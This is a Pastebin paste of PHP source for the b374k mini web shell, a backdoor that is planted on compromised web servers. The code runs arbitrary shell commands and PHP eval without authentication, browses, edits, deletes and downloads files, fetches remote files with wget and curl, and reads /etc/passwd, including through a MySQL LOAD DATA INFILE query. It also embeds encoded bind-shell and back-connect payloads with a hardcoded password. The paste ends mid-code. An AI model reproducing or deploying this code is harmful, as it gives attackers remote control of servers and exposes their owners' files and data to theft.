API tools faq
paste
AZZATSSINS_CYBERSERK

b374k mini

AZZATSSINS_CYBERSERK
Jun 13th, 2017
1,166
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 43.00 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. @error_reporting(0);
  3. @set_time_limit(0);
  4.  
  5.  
  6.  
  7. // php setting
  8. // download file
  9. if(isset($_GET['dl']) && ($_GET['dl'] != "")){
  10.     $file = $_GET['dl'];
  11.     $filez = @file_get_contents($file);
  12.    header("Content-type: application/octet-stream");
  13.    header("Content-length: ".strlen($filez));
  14.    header("Content-disposition: attachment; filename=\"".basename($file)."\";");
  15.    echo $filez;
  16.     exit;
  17. }
  18. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
  19.     $file = $_GET['dlgzip'];
  20.     $filez = gzencode(@file_get_contents($file));
  21.    header("Content-Type:application/x-gzip\n");
  22.    header("Content-length: ".strlen($filez));
  23.    header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  24.    echo $filez;
  25.     exit;
  26. }
  27. // view image
  28. if(isset($_GET['img'])){
  29.         @ob_clean();
  30.         $d = magicboom($_GET['y']);
  31.         $f = $_GET['img'];
  32.         $inf = @getimagesize($d.$f);
  33.         $ext = explode($f,".");
  34.         $ext = $ext[count($ext)-1];
  35.         @header("Content-type: ".$inf["mime"]);
  36.         @header("Cache-control: public");
  37.         @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  38.         @header("Cache-control: max-age=".(60*60*24*7));  
  39.         @readfile($d.$f);
  40.         exit;
  41. }
  42.  
  43. // server software
  44. $software = getenv("SERVER_SOFTWARE");
  45. // check safemode
  46. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;
  47. // uname -a
  48. $system = @php_uname();
  49. // check os
  50. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
  51. else $win = FALSE;
  52. // change directory
  53. if(isset($_GET['y'])){
  54.     if(@is_dir($_GET['view'])){
  55.         $pwd = $_GET['view'];
  56.         @chdir($pwd);
  57.     }
  58.     else{
  59.         $pwd = $_GET['y'];
  60.         @chdir($pwd);
  61.     }
  62. }
  63. // username, id, shell prompt and working directory
  64. if(!$win){
  65.     if(!$user = rapih(exe("whoami"))) $user = "";
  66.     if(!$id = rapih(exe("id"))) $id = "";
  67.     $prompt = $user." \$ ";
  68.     $pwd = @getcwd().DIRECTORY_SEPARATOR;
  69. }
  70. else {
  71.     $user = @get_current_user();
  72.     $id = $user;
  73.     $prompt = $user." &gt;";
  74.     $pwd = realpath(".")."\\";
  75.     // find drive letters
  76.     $v = explode("\\",$d);
  77.     $v = $v[0];
  78.     foreach (range("A","Z") as $letter)
  79.     {
  80.       $bool = @is_dir($letter.":\\");
  81.       if ($bool)
  82.       {
  83.           $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
  84.            if ($letter.":" != $v) {$letters .= $letter;}
  85.            else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
  86.            $letters .= " ]</a> ";
  87.       }  
  88.  }
  89. }
  90. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  91. else $posix = FALSE;
  92. // server ip
  93. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  94. // your ip ;-)
  95. $my_ip = $_SERVER['REMOTE_ADDR'];
  96. $bindport = "13123";
  97. $bindport_pass = "b374k";
  98.  
  99. // separate the working direcotory
  100. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
  101. $pwdurl = "";
  102. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
  103.     $pathz = "";
  104.     for($j = 0 ; $j <= $i ; $j++){
  105.         $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  106.     }
  107.     $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  108. }
  109.    
  110. // rename file or folder
  111. if(isset($_POST['rename'])){
  112.     $old = $_POST['oldname'];
  113.     $new = $_POST['newname'];
  114.     @rename($pwd.$old,$pwd.$new);
  115.     $file = $pwd.$new;
  116. }
  117.  
  118.  
  119.  
  120. // print useful info
  121. $buff  = $software."<br />";
  122. $buff .= $system."<br />";
  123. if($id != "") $buff .= $id."<br />";
  124. $buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your   ip : ".$my_ip."<br />";
  125. if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />";
  126. else $buff .= "safemode <span class=\"gaya\">OFF<span><br />";
  127. $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl;
  128.  
  129.  
  130.  
  131.  
  132. function rapih($text){
  133.     return trim(str_replace("<br />","",$text));
  134. }
  135.  
  136. function magicboom($text){
  137.     if (!get_magic_quotes_gpc()) {
  138.          return $text;
  139.     }
  140.     return stripslashes($text);
  141. }
  142.  
  143. function showdir($pwd,$prompt){
  144.     $fname = array();
  145.     $dname = array();
  146.     if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  147.     else $posix = FALSE;
  148.     $user = "????:????";
  149.     if($dh = @scandir($pwd)){
  150.         foreach($dh as $file){
  151.             if(is_dir($file)){
  152.                 $dname[] = $file;
  153.             }
  154.             elseif(is_file($file)){
  155.                 $fname[] = $file;
  156.             }
  157.         }
  158.     }
  159.     else{
  160.         if($dh = @opendir($pwd)){
  161.             while($file = @readdir($dh)){
  162.                 if(@is_dir($file)){
  163.                     $dname[] = $file;
  164.                 }
  165.                 elseif(@is_file($file)){
  166.                     $fname[] = $file;
  167.                 }
  168.             }
  169.             @closedir($dh);
  170.         }
  171.     }
  172.  
  173.    
  174.     sort($fname);
  175.     sort($dname);
  176.     $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  177.     $tree = @sizeof($path);
  178.     $parent = "";
  179.     $buff = "
  180.     <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  181.     <table class=\"cmdbox\" style=\"width:50%;\">
  182.     <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  183.     </form>
  184.     <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  185.     <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  186.     <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  187.     </form></table><table class=\"explore\">
  188.     <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
  189.     ";
  190.     if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  191.     else $parent = $pwd;  
  192.  
  193.     foreach($dname as $folder){
  194.         if($folder == ".") {
  195.             if(!$win && $posix){
  196.                 $name=@posix_getpwuid(@fileowner($folder));
  197.                 $group=@posix_getgrgid(@filegroup($folder));
  198.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  199.             }
  200.             else {
  201.                 $owner = $user;
  202.             }
  203.             $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\"><a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  204.             <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  205.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  206.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  207.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  208.             </form></td></tr>
  209.             ";
  210.         }
  211.         elseif($folder == "..") {
  212.             if(!$win && $posix){
  213.                 $name=@posix_getpwuid(@fileowner($folder));
  214.                 $group=@posix_getgrgid(@filegroup($folder));
  215.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  216.             }
  217.             else {
  218.                 $owner = $user;
  219.             }
  220.             $buff .= "<tr><td><a href=\"?y=".$parent."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  221.             <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  222.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  223.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  224.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  225.             </form>
  226.             </td></tr>";
  227.         }
  228.         else {
  229.             if(!$win && $posix){
  230.                 $name=@posix_getpwuid(@fileowner($folder));
  231.                 $group=@posix_getgrgid(@filegroup($folder));
  232.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  233.             }
  234.             else {
  235.                 $owner = $user;
  236.             }
  237.             $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
  238.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  239.             <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  240.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  241.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  242.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  243.             </form>
  244.             <td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>";
  245.         }
  246.     }
  247.  
  248.     foreach($fname as $file){
  249.         $full = $pwd.$file;
  250.         if(!$win && $posix){
  251.             $name=@posix_getpwuid(@fileowner($folder));
  252.             $group=@posix_getgrgid(@filegroup($folder));
  253.             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  254.         }
  255.         else {
  256.             $owner = $user;
  257.         }      
  258.         $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\">$file</a>
  259.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  260.         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  261.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  262.         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  263.         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  264.         </form>
  265.         </td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  266.         <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
  267.     }
  268.     $buff .= "</table>";
  269.     return $buff;
  270. }
  271.  
  272. function ukuran($file){
  273.     if($size = @filesize($file)){
  274.         if($size <= 1024) return $size;
  275.         else{
  276.             if($size <= 1024*1024) {
  277.                 $size = @round($size / 1024,2);;
  278.                 return "$size kb";
  279.             }
  280.             else {
  281.                 $size = @round($size / 1024 / 1024,2);
  282.                 return "$size mb"; 
  283.             }
  284.         }
  285.     }
  286.     else return "???";
  287. }
  288.  
  289. function exe($cmd){
  290.     if(function_exists('system')) {
  291.         @ob_start();
  292.         @system($cmd);
  293.         $buff = @ob_get_contents();
  294.         @ob_end_clean();
  295.         return $buff;
  296.     }
  297.     elseif(function_exists('exec')) {
  298.         @exec($cmd,$results);
  299.         $buff = "";
  300.         foreach($results as $result){
  301.             $buff .= $result;
  302.         }
  303.         return $buff;
  304.     }
  305.     elseif(function_exists('passthru')) {
  306.         @ob_start();
  307.         @passthru($cmd);
  308.         $buff = @ob_get_contents();
  309.         @ob_end_clean();
  310.         return $buff;
  311.     }
  312.     elseif(function_exists('shell_exec')){
  313.         $buff = @shell_exec($cmd);
  314.         return $buff;
  315.     }
  316. }
  317.  
  318. function tulis($file,$text){
  319.     $textz = gzinflate(base64_decode($text));
  320.      if($filez = @fopen($file,"w"))
  321.      {
  322.          @fputs($filez,$textz);
  323.          @fclose($file);
  324.      }
  325. }
  326.  
  327. function ambil($link,$file) {
  328.    if($fp = @fopen($link,"r")){
  329.        while(!feof($fp)) {
  330.             $cont.= @fread($fp,1024);
  331.         }
  332.         @fclose($fp);
  333.        $fp2 = @fopen($file,"w");
  334.        @fwrite($fp2,$cont);
  335.        @fclose($fp2);
  336.    }
  337. }
  338.  
  339. function which($pr){
  340.     $path = exe("which $pr");
  341.     if(!empty($path)) { return trim($path); } else { return trim($pr); }
  342. }
  343.  
  344. function download($cmd,$url){
  345.     $namafile = basename($url);
  346.     switch($cmd) {
  347.         case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
  348.         case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
  349.         case 'wfread' : ambil($wurl,$namafile);break;
  350.         case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  351.         case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  352.         case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  353.         case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  354.         default: break;
  355.     }
  356.     return $namafile;
  357. }
  358.  
  359. function get_perms($file)
  360. {
  361.     if($mode=@fileperms($file)){
  362.         $perms='';
  363.         $perms .= ($mode & 00400) ? 'r' : '-';
  364.         $perms .= ($mode & 00200) ? 'w' : '-';
  365.         $perms .= ($mode & 00100) ? 'x' : '-';
  366.         $perms .= ($mode & 00040) ? 'r' : '-';
  367.         $perms .= ($mode & 00020) ? 'w' : '-';
  368.         $perms .= ($mode & 00010) ? 'x' : '-';
  369.         $perms .= ($mode & 00004) ? 'r' : '-';
  370.         $perms .= ($mode & 00002) ? 'w' : '-';
  371.         $perms .= ($mode & 00001) ? 'x' : '-';
  372.         return $perms;
  373.     }
  374.     else return "??????????";
  375. }
  376.  
  377. function clearspace($text){
  378.     return str_replace(" ","_",$text);
  379. }
  380.  
  381. // net tools
  382. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
  383. +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
  384. P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
  385. dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
  386. 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
  387. Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
  388. HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
  389. tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
  390. ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
  391. uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  392. $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
  393. NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
  394. tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
  395. e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
  396. LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
  397. vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
  398. +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  399. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
  400. ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
  401. S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
  402. ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw
  403. Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  404. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
  405. BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95
  406. zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75
  407. i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A
  408. RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
  409. jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F
  410. 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  411. ?>
  412. <html><head><title>:: b374k m1n1 1.01 ::</title>
  413. <script type="text/javascript">
  414. function tukar(lama,baru){
  415.     document.getElementById(lama).style.display = 'none';
  416.     document.getElementById(baru).style.display = 'block';
  417. }
  418. </script>
  419. <style type="text/css">
  420. body{
  421.     background:#000000;;
  422. }
  423. a {
  424. text-decoration:none;
  425. }
  426. a:hover{
  427. border-bottom:1px solid #4C83AF;
  428. }
  429. *{
  430.     font-size:11px;
  431.     font-family:Tahoma,Verdana,Arial;
  432.     color:#FFFFFF;
  433. }
  434. #menu{
  435.     background:#111111;
  436.     margin:8px 2px 4px 2px;
  437. }
  438. #menu a{
  439.     padding:4px 18px;
  440.     margin:0;
  441.     background:#222222;
  442.     text-decoration:none;
  443.     letter-spacing:2px;
  444. }
  445. #menu a:hover{
  446.     background:#191919;
  447.     border-bottom:1px solid #333333;
  448.     border-top:1px solid #333333;
  449. }
  450. .tabnet{
  451.     margin:15px auto 0 auto;
  452.     border: 1px solid #333333;
  453. }
  454. .main {
  455.     width:100%;
  456. }
  457. .gaya {
  458.     color: #4C83AF;
  459. }
  460. .inputz{
  461.     background:#111111;
  462.     border:0;
  463.     padding:2px;
  464.     border-bottom:1px solid #222222;
  465.     border-top:1px solid #222222;
  466. }
  467. .inputzbut{
  468.     background:#111111;
  469.     color:#4C83AF;
  470.     margin:0 4px;
  471.     border:1px solid #444444;
  472.  
  473. }
  474. .inputz:hover, .inputzbut:hover{
  475.     border-bottom:1px solid #4C83AF;
  476.     border-top:1px solid #4C83AF;
  477. }
  478. .output {
  479.     margin:auto;
  480.     border:1px solid #4C83AF;
  481.     width:100%;
  482.     height:400px;
  483.     background:#000000;
  484.     padding:0 2px;
  485. }
  486. .cmdbox{
  487.     width:100%;
  488. }
  489. .head_info{
  490.     padding: 0 4px;
  491. }
  492. .b374k{
  493.     font-size:30px;
  494.     padding:0;
  495.     color:#444444;
  496. }
  497. .b374k1{
  498.     font-size:30px;
  499.     padding:0;
  500.     color: #333333;
  501. }
  502. .b374k_tbl{
  503.     text-align:center;
  504.     margin:0 4px 0 0;
  505.     padding:0 4px 0 0;
  506.     border-right:1px solid #333333;
  507. }
  508. .phpinfo table{
  509.     width:100%;
  510.     padding:0 0 0 0;
  511. }
  512. .phpinfo td{
  513.     background:#111111;
  514.     color:#cccccc;
  515. padding:6px 8px;;
  516. }
  517. .phpinfo th, th{
  518.     background:#191919;
  519.     border-bottom:1px solid #333333;
  520. font-weight:normal;
  521. }
  522. .phpinfo h2, .phpinfo h2 a{
  523.     text-align:center;
  524.     font-size:16px;
  525.     padding:0;
  526.     margin:30px 0 0 0;
  527.     background:#222222;
  528.     padding:4px 0;
  529. }
  530. .explore{
  531. width:100%;
  532. }
  533. .explore a {
  534. text-decoration:none;
  535. }
  536. .explore td{
  537. border-bottom:1px solid #333333;
  538. padding:0 8px;
  539. line-height:24px;
  540. }
  541. .explore th{
  542. padding:3px 8px;
  543. font-weight:normal;
  544. }
  545. .explore th:hover , .phpinfo th:hover{
  546. border-bottom:1px solid #4C83AF;
  547. }
  548. .explore tr:hover{
  549. background:#111111;
  550. }
  551. .viewfile{
  552. background:#EDECEB;
  553. color:#000000;
  554. margin:4px 2px;
  555. padding:8px;
  556. }
  557. .sembunyi{
  558. display:none;
  559. padding:0;margin:0;
  560. }
  561.  
  562. </style>
  563. </head>
  564. <body onLoad="document.getElementById('cmd').focus();">
  565. <div class="main">
  566. <!-- head info start here -->
  567. <div class="head_info">
  568. <table><tr>
  569. <td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k">b<span class="b374k1">374</span>k</span></a></td></tr><tr><td>m1n1 1.01</td></tr></table></td>
  570. <td><?php echo $buff; ?></td>
  571. </tr></table>
  572. </div>
  573. <!-- head info end here -->
  574. <!-- menu start -->
  575. <div id="menu">
  576. <a href="?<?php echo "y=".$pwd; ?>">explore</a>
  577. <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">shell</a>
  578. <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">eval</a>
  579. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">mysql</a>
  580. <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">phpinfo</a>
  581. <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">netsploit</a>
  582. <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">upload</a>
  583. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">mail</a>
  584. </div>
  585. <!-- menu end -->
  586.  
  587. <?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
  588. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  589. <table class="cmdbox">
  590. <tr><td>
  591. <textarea class="output" name="cmd" id="cmd">
  592. <?php
  593. if(isset($_POST['submitcmd'])) {
  594.     echo eval(magicboom($_POST['cmd']));
  595. }
  596. else echo "echo file_get_contents('/etc/passwd');";
  597. ?>
  598. </textarea>
  599. <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
  600. </table>
  601. </form>
  602.  
  603. <?php }
  604. elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
  605. if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
  606.     $sqlhost = $_GET['sqlhost'];
  607.     $sqluser = $_GET['sqluser'];
  608.     $sqlpass = $_GET['sqlpass'];
  609.     $sqlport = $_GET['sqlport'];
  610.     if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){
  611.         // show mysql info
  612.         $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  613.         $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  614.         $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>";
  615.         if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  616.         if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  617.         $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  618.         $msg .= "</div>";
  619.         echo $msg;
  620.         if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
  621.             $db = $_GET['db'];
  622.             $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
  623.             $msg  = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\">
  624.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  625.             <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  626.             <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  627.             <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  628.             <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  629.             <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  630.             <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  631.             <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  632.             <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p>
  633.             </form></div>
  634.             ";
  635.  
  636.  
  637.             // show available tables
  638.             $tables = array();
  639.             $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
  640.             $hasil = @mysql_list_tables($db,$con);     
  641.             while(list($table) = @mysql_fetch_row($hasil)){
  642.                 @array_push($tables,$table);
  643.             }
  644.             @sort($tables);
  645.             foreach($tables as $table){
  646.                 $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>";
  647.             }
  648.             $msg .= "</table>";
  649.         }
  650.         elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
  651.             // dump tables
  652.             $db = $_GET['db'];
  653.             $table = $_GET['table'];
  654.             $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
